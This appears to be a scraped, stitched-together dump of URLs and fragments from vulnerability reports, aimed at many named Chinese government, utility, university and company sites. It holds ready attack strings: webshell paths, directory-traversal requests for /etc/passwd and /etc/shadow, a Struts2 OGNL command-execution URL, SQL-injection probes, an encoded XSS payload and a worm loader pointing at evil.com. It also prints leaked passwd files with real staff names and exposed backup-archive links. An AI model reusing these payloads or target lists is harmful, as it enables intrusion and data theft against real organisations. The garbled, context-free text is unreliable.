http://ts.hjenglish.com/subject/enmusic/zt/song2/getdata_review.aspx?id=65543 http://ts.hjenglish.com/subject/enmusic/zt/song2/getdata_review.aspx?id=65543 http://ts.hjenglish.com/subject/enmusic/zt/song2/getdata_review.aspx?id=65543 http://m.hujiang.com/en/p528357/ 
http://cet.hjenglish.com/yingyu_guanlian/114175/ http://s.hujiang.com/add/17/638 http://bulo.hujiang.com/gongyi/donate/ http://bulo.hujiang.com/app/zt/gongyi/pay_gateway.aspx?donate_id=27107&money=100.0000&donate_num= http://www.fhgt.gov.cn/ http://www.fhgt.gov.cn/shell.php http://www.hyxgt.gov.cn/ http://www.hyxgt.gov.cn/shell.php http://www.bjxgt.gov.cn/ http://www.bjxgt.gov.cn/shell.php http://www.jsgtzy.gov.cn/ http://www.jsgtzy.gov.cn/shell.php http://www.lsgt.gov.cn/ http://www.lsgt.gov.cn/shell.php http://www.lxxgt.gov.cn/ http://www.lxxgt.gov.cn/shell.php http://jxjy.yzrsks.com/login_admin.jsp http://m.baidu.com/ssid=0/from=2001c/bd_page_type=1/uid=428BA8C89C248CFFBA44C5CE9F579198/pu=sz@1320_1003,ta@iphone_2_4.1_1_9.2,usm@0/baiduid=09599FAFC56C1B9A4DDEF52E13B76316/w=0_10_%E6%B6%93%E5%B6%87%E6%99%B1%E7%81%8F%E5%97%98%E6%BD%B5%20%E6%B6%93%E5%B6%85%E5%BA%B7%E6%9D%A9%E5%9B%A7%E5%B9%93%E7%92%87%E8%AF%B2%E6%82%97%E9%8E%B0%EF%BF%BD/t=iphone/l=3/tc?srd=1&dict=20&ua=1&src=http%3A%2F%2Fdouban.com www.ule.com订单查看中已有权限控制,不能越权查看其他用户订单。 http://my.ule.com/usr/addressSave.do http://service.ule.tom.com/api/order/getOrderInfo.do http://s.anyview.net/material/bg.php?style=1 http://ge.07073.com ge.07073.com/uninstall/.svn/text-base/config.php.svn-base http://weather.com.cn/ http://tq121.weather.com.cn/futurelife/view.php?id=765681 http://61.155.159.239:8080/ VERSION:1.2.2 http://zhaoren.idtag.cn/samename/searchName!searchIndex.htm http://114.80.121.11/portal/showcase.php?id=12 http://114.80.121.92/security/index.action http://114.80.121.25/bud/user/index.action http://114.80.121.81/login.action http://cring.118320.com:8081/voice/activity/index.action www.gfan.com http://www.13cr.com/js-0.html Post:search=%27 www.13cr.com http://misc.maxthon.cn/mxbrowser_lang/translation.php?lang=id&page=30 www.gfan.com www.gfan.com http://target/jcms/m_5_9/sendreport/downfile.jsp?filename=/etc/passwd&savename=passwd.txt http://target/jcms/m_5_9/sendreport/,然后生成报表就看得到了。 
http://target/jcms/m_5_e/init/comment/opr_readfile.jsp?filename=../../../../../../../../../../../../../../../../etc/passwd http://target/jcms/m_5_e/init/guestbook/opr_readfile.jsp?filename=../../../../../../../../../../../../../../../../etc/passwd http://120.193.9.23/ http://blog.sina.com.cn/u/3636469737 http://www.lesuke.com/front/alipay_authAuthorize.do http://h.lesuke.com/comUserReg_toReg.do http://hnbh.hn-fda.gov.cn/login!login.do http://lib.sx.cn/pcons/front/getDataListByPage.action?siteId=1&channelId=59 http://www.gdfcl.com.cn/gdfcl/into/intolist.action;jsessionid=4CD202A4C5A06EADAC2F8ADF1F8514F3 http://11185.bjpost.com.cn/ep/sysManager/userAction!userLogin.action http://ev.apps.cctv.com/app_ev/program09/newsletter/destroyEmail.jsp?id=7988 http://www.yitour.net/travel/admin/user/login.action http://www.dianning.com/thing/index.action http://www.wooyun.org/bugs/wooyun-2013-035846/trace/c16ee5f89abb5b82d6e09e14c772a9d3 http://meirong.yangtse.com/chanel.php?id=1 http://gevent.kongzhong.com/resurrect/toupgradekey.action http://quiz.astro.ifeng.com/ma/index.php?ac=c¶m=2 http://quiz.astro.ifeng.com/ma/index.php?ac=c¶m=2 http://www.zdgt.gov.cn/public/show.jsp?id=20130830091083 http://www.czjt.gov.cn:81 http://hsj.czjt.gov.cn http://jgz.czjt.gov.cn http://zjc.czjt.gov.cn http://www.jslyjt.gov.cn http://xjc.czjt.gov.cn http://ajc.czjt.gov.cn http://zzc.czjt.gov.cn http://czjc.czjt.gov.cn http://ygc.czjt.gov.cn http://gkc.czjt.gov.cn http://hdc.czjt.gov.cn http://sgz.czjt.gov.cn http://glc.czjt.gov.cn http://cyjt.czjt.gov.cn http://zjz.czjt.gov.cn http://jtysj.changzhou.gov.cn http://czjc.czjt.gov.cn/publicfiles/model/ http://czjc.czjt.gov.cn/publicfiles/model/1.jsp http://czjc.czjt.gov.cn/publicfiles/model/12.htm http://czjc.czjt.gov.cn/publicfiles/m3.htm http://www.czjt.gov.cn/publicfiles/m3.htm http://hsj.czjt.gov.cn/publicfiles/m3.htm http://jgz.czjt.gov.cn/publicfiles/m3.htm http://zjc.czjt.gov.cn/publicfiles/m3.htm http://www.jslyjt.gov.cn/publicfiles/m3.htm 
http://xjc.czjt.gov.cn/publicfiles/m3.htm http://ajc.czjt.gov.cn/publicfiles/m3.htm http://zzc.czjt.gov.cn/publicfiles/m3.htm http://czjc.czjt.gov.cn/publicfiles/m3.htm http://ygc.czjt.gov.cn/publicfiles/m3.htm http://gkc.czjt.gov.cn/publicfiles/m3.htm http://hdc.czjt.gov.cn/publicfiles/m3.htm http://sgz.czjt.gov.cn/publicfiles/m3.htm http://glc.czjt.gov.cn/publicfiles/m3.htm http://cyjt.czjt.gov.cn/publicfiles/m3.htm http://zjz.czjt.gov.cn/publicfiles/m3.htm http://jtysj.changzhou.gov.cn/publicfiles/m3.htm http://www.952111.com/bankCard/edit.do http://dmb.star-net.cn/ http://dmb.star-net.cn/aspx/searchresult.aspx?keyword=1 http://el.7daysinn.cn:81 http://120.35.11.156:81/,找到相应的配置信息 http://120.35.11.156:81/webresource.axd?d=AqBDlhyQSWwoYB19J3EqwOtkKU2n76etN_OvQfBxOWU1,在审查源码中找; http://120.35.11.156:81/webresource.axd?d=AqBDlhyQSWwoYB19J3EqwOtkKU2n76etN_OvQfBxOWU1 http://120.35.11.156:81/scriptresource.axd?d=lkYlJ3fxLEQaeJv5cHCyhtWuwWkL2J7VJP7lAuhM4WIAAAAAAAAAAAAAAAAAAAAA0 http://xhzhglxt.cirea.org.cn/website/dfxhs_cx_gs.asp?DwID=7297注入点 http://www.21education.com.cn/newsInfo.asp?id=171 http://nba.hupu.com/admin/coach.php http://nba.hupu.com/admin/coach.php http://nba.hupu.com/admin/add_edit_coach.php?option=coach&action=edit&coach_id=11 https://service.allinpay.com/usercenter/user/Main/index.do http://www.cpic.com.cn/life/shouhu/mobile/config.php http://mm.xunlei.com/6house/indexweb.html?t=1&loadurl=http%3A%2F%2Fha.cker.in%2F http://lbc.baidu.com/ http://www.fjcanet.gov.cn:81/unms/login.action mantis:http://mantis.fantong.com/view_all_bug_page.php http://txs.eol.cn/article_page.php?articleid=95550 http://www.yunzuche.com/main.action http://www.fjtzb.org.cn:8000/infoup/user/user!login.action http://srm.lzlj.com.cn/app/pages/login.action http://www.uni-president.com.cn http://www.uni-president.com.cn/ft/admin/11.aspx http://www.chinarma.cn/CRMA/quickWelcome.action http://cgs.ytjj.gov.cn/ytcgs/wswdcgs.action 
http://greenadsl.com/interceptState/InterceptState_findInterceptState.action http://www.zhaoxiaoshuo.com/my/book_list.php http://nlp.ict.ac.cn/Admin/index.php ns.stats.gov.cn/sns.stats.gov.cn ns.nsa.gov.cn/ns2.nsa.gov.cn http://zhaopin.evideostb.com/admin/login.aspx http://218.22.211.155:7915/ ftp://218.22.211.155 http://218.29.134.77/login/toLoginPage.do http://www.efaka.com/efaka/index.do http://lisniuse2.blog.163.com/ http://218.5.11.78/ http://218.5.11.78/export.action?fileName=../../../../../../../../../../etc/services×= http://218.5.11.78/export.action?fileName=../../../../../../../../../../etc/passwd×= http://218.5.11.78/export.action?fileName=../../../../../../../../../../etc/passwd×= http://218.5.11.78/export.action?fileName=../../../../../../../../../../etc/sysctl.conf×= http://support.zte.com.cn/admin/ http://hljdl.hl.sgcc.com.cn/register.aspx http://hljdl.hl.sgcc.com.cn https://ebank.guilinbank.com.cn/jfyMall/pointsaccountplan/buy.do http://cms.jl.sgcc.com.cn http://cms.jl.sgcc.com.cn/site1/templates/2013/09/01/A2B0B4645781461AA35225C62F0D98F9.jsp?o=vLogin http://pqs.epri.sgcc.com.cn/ http://pqs.epri.sgcc.com.cn/db.rar http://pqs.epri.sgcc.com.cn/website.rar http://pqs.epri.sgcc.com.cn/Level_List.aspx?D_ID=5&P_id=35 http://www.dje.ah.sgcc.com.cn http://www.dje.ah.sgcc.com.cn/english/imglist.aspx?nodeid=16 http://bid.ha.sgcc.com.cn http://bid.ha.sgcc.com.cn/upgrade/wooyunxpz.aspx http://www.eb.com.cn/scripts/ajaxnormal1.asp?action=GetHostproduct http://xfyj.sgcc.com.cn/index.action http://211.160.19.243 http://211.160.19.243/vds/analysis/vxinfo?vxtype=66&type=ovx&dateB=1378047782&dateE=1378134182 https://bosp.sgid.sgcc.com.cn/ https://bosp.sgid.sgcc.com.cn/LoginAction.do https://bosp.sgid.sgcc.com.cn/LoginAction.do http://61.183.0.37:8003/ http://www.sjhlcs.com/wwwroot/news-xx.asp?news_id=200912040001&language=&news_action=show 
http://conference.hitb.org/hitbsecconf2012ams/materials/D1T1%20-%20Roberto%20Suggi%20and%20Scott%20Bell%20-%20Browser%20Bug%20Hunting%20in%202012.pdf http://vdisk.weibo.com/s/z1id0otCRMVPt http://127.0.0.1/m.xml,m.xml的内容为: xmlns:content="http://purl.org/rss/1.0/modules/content/ xmlns:wfw="http://wellformedweb.org/CommentAPI/ http://xgb.pku.edu.cn/home/homePicInfo.action http://myhome.bjtu.edu.cn/user/getArticle.action http://acm.bjtu.edu.cn/vjudge/contest/checkAuthorizeStatus.action http://kjc.njtu.edu.cn/listFrontUserFiles.action http://jjh.ustb.edu.cn/XiaoYou/manage/viewArticles.action http://cjdyz.bnuz.edu.cn/zmyz.action http://www.swxxf.sdu.edu.cn/randCode.action http://ivipc.uestc.edu.cn/module/news/read.action http://gms.uestc.edu.cn/gms_sso/rand.action http://msdn.microsoft.com/en-us/library/ms682425.aspx http://61.178.83.84:8083/showContent.action http://202.100.20.66/ http://msdn.microsoft.com/en-us/library/ms682425.aspx http://msdn.microsoft.com/en-us/library/ms682425.aspx http://123.125.89.27:8080/secure/Dashboard.jspa,注册的话没有限制,进入后可随意查看bug信息。 http://www.x6game.cn http://www.x6game.cn/news_cont.php?id=125 http://dk.x6game.cn/jsp/details.jsp?id=2 http://220.191.211.197:8068/wwsb/qjdh.action www.yidong.com.cn/bbs.asp www.yidong.com.cn/1.asp www.yidong.com.cn/test.txt http://112.4.133.85:299/sncn http://121.199.5.170 http://115.236.102.90/bin.rar http://zone.wooyun.org/content/1149 http://125.70.227.197:8666/SL/slProjectMainPage.aspx http://mail.spc.com.cn/ http://mail.spc.com.cn/test.txt http://www.gsjzsc.com.cn/ http://www.gsjzsc.com.cn/test.txt http://wap.cytxl.com.cn/logoutAction.action http://wap.cytxl.com.cn/showpageContactlistAction.action?resp_type=wap2&sid=FC2CE1&contactUserId=1000001 http://app.finance.ifeng.com/fund/jjjz_kfjj.php?type=0&oper_codei=1102 ftp://121.199.15.205/ ftp://121.199.15.205/yinglegou_IC3PB5/yinglegou_IC3PB5/ http://121.199.15.205/manage/ ftp://218.28.178.238 http://218.28.178.238/ http://61.178.48.40/ 
http://61.178.48.40/test.txt http://110.90.115.45/ http://110.90.115.45/test.txt http://jyxx.ah.sgcc.com.cn/login.aspx?ReturnUrl=%2fweb%2findex.aspx http://jyxx.ah.sgcc.com.cn/web/file/ http://jyxx.ah.sgcc.com.cn/web/file/fdqjyqk/Book1.xls http://jyxx.ah.sgcc.com.cn/web/file/jyjhwcqk/Book5%EF%BC%881%E6%9C%8831%E6%97%A5%EF%BC%89.xls http://www.ikuai8.com/helplist.php?id=3 http://211.103.[马赛克]:808/IPTrend http://faq.xiaomi.cn/ http://www.sdnpc.com/sdnpc/jeecms/ArtiSearch.do url:http://bbs.auto.sina.com.cn http://www.cafs.ac.cn/page/cafs/JianBao/Manager/index.asp http://im.t5y.cn:8080/twy/logout.action http://www.ncmtr.com/news.php?typeid=3 http://211.153.73.190/loginAction.do http://211.153.73.190/admin.html https://211.151.146.45:443/ site:7daysinn.cn filetype:htm http://mt.7daysinn.cn/DBQuery/Notice.htm)隐约泄漏出来的信息 dk.7daysinn.cn/About.htm)”的东西,打开之后可以很惊奇的发现有个修改密码的按钮 http://dk.7daysinn.cn/api/API.asmx http://www.dianping.com/member/jsonp/followUser?memberId=xxxxxx http://www.dianping.com/ajax/member/userTagOperator?oldUserTag=&newUserTag=0-天气不错-2 http://www.ikuai8.com/support_list.php http://www.ikuai8.com/helpcon.php?id=1'--&t=3 http://www.ikuai8.com/helplist.php?id=%5c http://www.ikuai8.com/more_list.php?keyword=1%27%22&type=1 http://tieba.youxi.baomihua.com/TieZiDetail.aspx?PostsID=379&TieBaID=1201 https://218.26.181.12:8080/cgi/maincgi.cgi?Url=Command&Action= https://218.26.181.12:8080/cgi/maincgi.cgi?Url=CommandResult http://gtj.boluo.gov.cn/ http://gtj.boluo.gov.cn/test.txt http://x.x.40.6/sdcms/admin/sd_admin.asp?act=adddb http://team.07073.com/ http://team.07073.com/wp-login.php http://drops.wooyun.org/papers/548 http://tea504.sinaapp.com/demo.html http://tea504.sinaapp.com/android/poc1.html http://www.hbda.gov.cn/news.do?method=downloadFile&fileName=../../../WEB-INF/web.xml http://www.ebuick.com.cn/beijing/price/price/0/290/1.html http://50.56.33.56/blog/?p=314 http://drops.wooyun.org/papers/548 
http://www.fmi.com.cn/index.php/MgrUnity/detail/tid/7394/cid/3/rid/2/ http://61.178.48.15/ http://61.178.48.15/test.txt http://www.ahmcsj.gov.cn/ahmcsj.zip http://61.178.59.134/ http://61.178.59.134/BaseFlatPage/FlatSysManage/modemanage/MokuaiTree.aspx http://61.178.59.134/BaseFlatPage/FlatSysManage/modemanage/mode.aspx http://expert.womai.com/wp-login.php http://expert.womai.com/wp-login.php http://freshman.zjicm.edu.cn/yxxt/web/zzfw_index.do http://218.58.156.220:8002/yxxt/web/zzfw_index.do http://222.43.71.134:8020/yxxt/web/zzfw_index.do http://xg.glut.edu.cn:8080/yxxt/web/zzfw_index.do http://yxxt.yngsxy.net:8081/yxxt/web/zzfw_index.do http://yx.gdsdxy.cn/yxxt/web/zzfw_index.do http://yx.heuet.edu.cn/yxxt/web/zzfw_index.do http://60.191.79.168:8090/yxxt/web/zzfw_index.do http://www.nbsj.gov.cn/nbsj.rar http://www.ycssjj.gov.cn/web.rar http://www.cxsjj.gov.cn/1.rar http://www.dsxsjj.com/www.zip com.shangdu.com/Product.aspx?productid=100000 com.shangdu.com/Product.aspx?productid=100000'单引号,错误出来。 http://pay.pomoho.com/pay29293/throwloglist.aspx?userid=53260241&gameid=&areaid= http://218.26.22.3:8090/sxkh/indexAction.do http://about.jike.com/conf/web.xml http://about.jike.com/conf/server.xml http://about.jike.com/conf/tomcat-users.xml http://s13.mogujie.cn/b7/pic/130904/y61xb_kqyxcn2ekfbfqtdwgfjeg5sckzsew_20x20.jpg.php;aa_960x400.php;aa http://www.yimidai.com/沦陷, http://www.yimidai.com/jiushao.asp http://yimidai.com/plus/mytag_js.php?aid=9090 http://www.yimidai.com/bbs/ http://www.tchjbh.gov.cn/news_display.php?id=148 http://www.ykxs.gov.cn/jg_view.php?id=141 position:absolute;width:100%;height:300%;background-color vertical-align:top http://www.whmzzj.gov.cn:8080/index.do http://jifen.womai.com/share.php?activity=6&code=13055364&mid=0 baozoumanhua.com/articles/4573284/dn VERSION:1.2.2 http://my.taobao.com/ http://202.108.8.98/search.jsp?gaojieshow=1&lableId=95821 http://adminf.dixintong.com/login1.aspx http://sale.dixintong.com/ajax/getstore.ashx?province= 
http://116.228.223.212:7001/tel/telpay/TelPay/forTelPay.do?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27cat%27,%27/etc/passwd%27}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29 http://218.65.88.119:8899/xygsfind/view/view.action http://123.196.123.15/ www.lyqyj.gov.cn ftp://www.lyqyj.gov.cn http://zone.wooyun.org/content/6463 http://zone.wooyun.org/index.php?do=edit&act=delcomment&id=【commentLi http://125.39.185.229:8000/login.bf root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin 
avahi-autoipd:x:100:102:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin mike:x:10002:10002:Liu Xiaofeng:/home/mike:/bin/bash yutaka:x:10001:10001:Shi Yu:/home/yutaka:/bin/bash dingqi:x:10094:10094:dingqi:/home/dingqi:/bin/bash wangbisheng:x:20028:20028:wangbisheng:/home/wangbisheng:/bin/bash muran:x:30123:30123:muran:/home/muran:/bin/bash tzw:x:30136:30136:tianzhiwei:/home/tzw:/bin/bash wangshiqi:x:30137:30137:wangshiqi:/home/wangshiqi:/bin/bash mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash apache:x:48:48:Apache:/var/www:/sbin/nologin www:x:30138:30138::/home/www:/bin/bash rsync:x:501:501:for transfer:/home/rsync:/bin/bash taifuyu:x:10017:10017:Tai Fuyu:/home/taifuyu:/bin/bash ldap:x:55:55:LDAP User:/var/lib/ldap:/bin/false nagios:x:30139:30139::/home/nagios:/bin/bash chenwenlong:x:30127:30127:chenwenlong:/home/chenwenlong:/bin/bash xiaojun:x:10033:10033:Tong Xiaojun:/home/xiaojun:/bin/bash yejun:x:30277:30277:yejun:/home/yejun:/bin/bash liuxiao:x:30130:30130:liuxiao:/home/liuxiao:/bin/bash zhangpei:x:30281:30281:zhangpei:/home/zhangpei:/bin/bash chenliang:x:30142:30142:chenliang:/home/chenliang:/bin/bash http://tw.xiaomi.com域名) http://tw.xiaomi.com/accessories/all?adapt=&page=1 http://app2.gzstats.gov.cn/auth/login.action http://219.139.130.103:8080/login.action http://yw.baoku.com.cn/login.aspx mailto:fuckyou@crazy.com?subject=HTML&body=hello display:none http://222.180.11.74:8087/common/common_info.action http://222.180.11.74:8087/Silic.jsp http://www.henancatv.com:8080/guestAction!view.action http://www.datangwealth.com/front/show-product!show.action www.gdcsgj.com/ReadArt.asp?ArtID=18801 http://music.163.com/api/msg/private/send?type=text&msg=尼玛这是要逆天啊,www.evil.com/evil.js&userIds=忘不了啊&time=-1 www.evil.com/evil.js”为包含worm的恶意代码 http://220.249.194.22/common/common_info.action?wid=201110151602351136&menu=3 http://220.249.194.22/Silic.jsp http://mchina.cn/query/category2.jsp?dir=%2Fvar%2Fspool%2Fabrt-upload 
http://www.cnddr.com/eBusiness/GB/product_detail.asp?catalogid=3&productid=26 http://www.its-standards.cn/ http://www.its-standards.cn/logtest.txt http://wap.hexin.cn http://wap.hexin.cn/dlxhtml/download.php?bid=4528&bname=%E9%80%9A%E7%94%A8%E5%8C%BA&fn=../../../../../../../../../../etc/shadow&mid=70&mname=iPad http://wap.hexin.cn/dlxhtml/download.php?bid=4528&bname=%E9%80%9A%E7%94%A8%E5%8C%BA&fn=../../../../../../../../../../etc/shadow&mid=70&mname=iPad root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin ais:x:39:39:openais Framework:/:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin luci:x:100:101::/var/lib/luci:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin pegasus:x:66:65:tog-pegasus services:/var/lib/Pegasus:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin ricci:x:101:103:ricci user:/var/lib/ricci:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin 
avahi-autoipd:x:102:104:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash ntp:x:38:38::/etc/ntp:/sbin/nologin update:x:505:506::/usr/local/apache/htdocs/waphtml:/bin/bash http://www.lysggb.gov.cn/common/common_info.action?design=17&wid=201106151411081008 http://www.lysggb.gov.cn/Silic.jsp http://1.207.242.13/indexAction.action http://1.207.242.13/Silic.jsp http://www.jungong.com.cn/controls/getstdtotable.ashx?cname=1 http://drops.wooyun.org/papers/548 http://lucky.anquanbao.com/app.htm http://www.lucky-bee.com/XsBbsAction!searchshopTypes.action http://www.lucky-bee.com/XsBbsAction!serachSelldatas.action http://www.lucky-bee.com/M4.txt http://113.204.164.234:8086/ http://www.cdss.gov.cn/manage/ http://60.216.97.249:9090/eduOnline/novalidateAction/downloadinfo.action http://218.94.1.82/biology/rss.action lp:/bin/false invscout:/usr/bin/ksh user:/usr/sbin/snapp:/usr/sbin/snappd ipsec:/usr/bin/ksh user:/var/spool/uucppublic:/usr/sbin/uucp/uucico pconsole:/usr/bin/ksh esa:/usr/bin/ksh oracle:/usr/bin/ksh http://www.sass.cn/skyc.asp?csmallclassid=162-2%2b4-2-2%2b99&csmallclassname=%CF%C2%D4%D8%D7%A8%C7%F8%A3%A8%CB%B6%CA%BF%A3%A9&name=yjs http://124.115.170.189/desktop/login/login.action http://124.207.21.90 http://124.207.21.90/logtest.txt http://www.w3.org/TR/html4/loose.dtd http://www.welinker.com/ca9768bd08c373665fbcc88021f088b6 http://223.202.15.179 https://58.56.128.8/tcs/ https://58.56.128.8/tcs/Frm_GetPassWord.aspx http://123.234.41.51:7001/signature/login.action http://www.blueyee.com/ http://www.chinalulutong.com/admin/admin!login.action http://www.hdeec.com/admin/admin!login.action http://expert.ccidnet.com/expert/list_expert.php?did=60 http://expert.ccidnet.com/expert/list_expert.php?did=60 http://event.pchome.net/admin/ http://改成了//,证明可以成功执行,这里要感谢@VIP http://bbs.51taoshi.com 
http://1.com\u0022\u003e\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u002f\u006f\u006e\u006c\u006f\u0061\u0064\u003d\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0029\u003e/1.swf http://school.51taoshi.com/school/index/courselist.action http://school.51taoshi.com/loginGoto.action http://school.51taoshi.com/school/index/course_Info.action http://school.51taoshi.com/M4.txt http://cglx.51taoshi.com/admin/ http://shanghai.koofang.com/rent/UpdateTime.php?id=1000133025 http://shanghai.koofang.com/login/register.php http://tiku.51taoshi.com http://tiku.51taoshi.com/?phpinfo=1 http://tiku.51taoshi.com/nmcHDtouch/index.php/Login/adminlogin http://bj.wo.com.cn/HD/llmm.action漏洞地址 http://218.203.214.57:8080/ADC20/sys/Logout.action http://wiki.koofang.com/ http://bbs.oupeng.com/home.php?mod=space&username=admin的信息,发现她的名字有点特别,于是,我就利用大数据的能力,获得了Csineneo用户的密码信息等 http://is.gd/HZZ6d7 http://www.e-trans.com.cn:8090/etrans4022/login.action http://vip.book.sohu.com/user/的个人信息修改处 http://gm.mccq.mingchao.com/module/index.php http://gm.mccq.mingchao.com/module/.svn/entries http://59.151.49.39:7080/login/login.do,存在Strust2命令执行漏洞。 http://www.xjbt.lss.gov.cn/database.rar http://www.511860.com/autologin/login!index.action http://2007.cepee.com/news/text.php?NewsId=70194&FT_Id=% http://113.140.70.184:4016/forUI/default.aspx http://113.140.70.184:4016/forui/corpinfo/corpbaseinfo.aspx?CorpCode=1 http://igrowing.ichzh.com/e/member/gz/news.php?id=294 http://www.bjsupervision.gov.cn:8080/caphtjcj/reportForm/viewdetail.action?reportForm.id=0100261 http://xtv.coocaatv.com/.然后对其进行社工扫描后台无果,查看登录页面的,JS文件,发现路径 www.trgov.gov.cn/trgov.rar www.nnghj.gov.cn/web.rar www.hnfzb.gov.cn/hnfzb.gov.cn.zip www.hbfgj.gov.cn/www.zip www.zzfda.gov.cn/zzfda.rar www.taian.gov.cn/web.rar www.ynyz.gov.cn/www.rar www.sctcm.gov.cn/sctcm.rar www.hnhq.gov.cn/wwwroot.zip www.hzyg.gov.cn/hzyg.rar www.siyang.gov.cn/web.zip www.lyq.gov.cn/lyq.rar http://www.whcc.com.cn/root.rar 
http://gosmstheme.goforandroid.com/GoThemeWeb/login/login!login.action http://www.cudatec.com/login.action http://www.tcom.gov.cn/web.rar http://www.gnsw.gov.cn/www.gnsw.gov.cn.zip http://www.wnsw.gov.cn/wnsw.rar http://www.syftec.gov.cn/syftec.rar http://113.200.200.46/ http://113.200.200.46/shell.asp http://info.bd.gov.cn/bd.rar http://sh.118100.cn/park/login/waplogin!deviceidbypet.action http://card.hn165.com/index.action http://t.iqiyi.com/home http://www.wncoop.gov.cn/web.rar http://www.wlcoop.com/wlcoop.rar http://www.cqta.gov.cn/wwwroot.rar http://top100.blogchina.com/home.action http://221.192.132.142:9998/admin/Cjy_load.do http://ideaclub.lenovo.com.cn/club/index.php?m=store&c=index&f=getPlace&item_id=ad2dc941e1fb11e29c5fc89cdcd8545b http://www.zkxf.com.cn/zkxf.rar http://www.bdxfj.gov.cn/bdxfj.rar www.dlink.com.cn http://www.dlink.com.cn/ScriptResource.axd?d=YjExFdnbDi8NGnxW49G-oOGkbHQDmoFIG-r2GywFxfMAAAAAAAAAAAAAAAAAAAAA0 http://forum.fengyunzhibo.com:9001/robots.txt/1.php http://dlkj.edufe.cn/initLogin.action http://training.szkj.edufe.cn/initLogin.action http://csadmin.edufe.cn//login.action http://zjkj.edufe.cn/initLogin.action inurl:initLogin.action height:400px;position:relative jboss-4.0.5.GA/server/default/./deploy/xxxx.war http://www.eq-igl.ac.cn/web.rar http://serach.17k.com http://adsales.tudou.com/ http://www.nicpbp.org.cn/dataquery/jdyw/queryproreq.action http://localhost:1104/ajax/content.aspx?oper=ajaxDownCount&cType=paper&id=1 http://115.236.102.125 http://115.236.102.125:8082的弱口令 http://www.uhui.cn/groupDetail.action www.xxxx.com/weblogin/index.aspx?ajax=true http://files.cnblogs.com/zpino/v5shop.rar http://wydrops-wordpress.stor.sinaapp.com/uploads/2013/09/v5shop.rar http://www.lslushan.com/web/getWebNewsList.action http://localhost/myfile/用户名/1.ashx http://wpa.qq.com/msgrd?v=3&uin= http://wpa.qq.com/pa?p=2:想攻击的QQ号:51 http://shop.lenovo.com/us/en/portals/communications?ipromoID=emlsu1a 
